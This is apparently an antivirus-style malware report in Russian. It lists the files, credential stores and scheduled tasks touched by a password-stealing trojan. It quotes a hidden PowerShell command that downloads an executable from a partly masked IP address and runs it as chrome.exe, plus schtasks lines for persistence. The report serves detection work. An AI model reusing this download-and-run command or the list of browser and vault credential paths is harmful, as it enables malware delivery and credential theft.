Техническая информация
- <SYSTEM32>\tasks\updates\cutjaylyxonpa
- http://19#.#2.66.106/f7oqqcwiq5sb5uf.exe как %appdata%\chrome.exe
- chrome.exe
- %APPDATA%\opera software\opera stable\login data
- %APPDATA%\thunderbird\profiles.ini
- %LOCALAPPDATA%\google\chrome\user data\default\login data
- %APPDATA%\mozilla\firefox\profiles.ini
- %TEMP%\abctfhghgdghghГї.sct
- %APPDATA%\chrome.exe
- %APPDATA%\cutjaylyxonpa.exe
- %TEMP%\tmpa3fc.tmp
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\policy.vpol
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch
- %LOCALAPPDATA%\microsoft\vault\4bf4c442-9b8a-41a0-b380-dd4a704ddb28\policy.vpol
- %TEMP%\tmpa3fc.tmp
- http://19#.#2.66.106/f7OqqcwIQ5Sb5uf.exe
- '%APPDATA%\chrome.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://19#.#2.66.106/f7OqqcwIQ5Sb5uf.exe','%APPDATA%\chrome.exe');Start-Proce...' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\cUTJaylYXoNPA" /XML "%TEMP%\tmpA3FC.tmp"' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\cUTJaylYXoNPA" /XML "%TEMP%\tmpA3FC.tmp"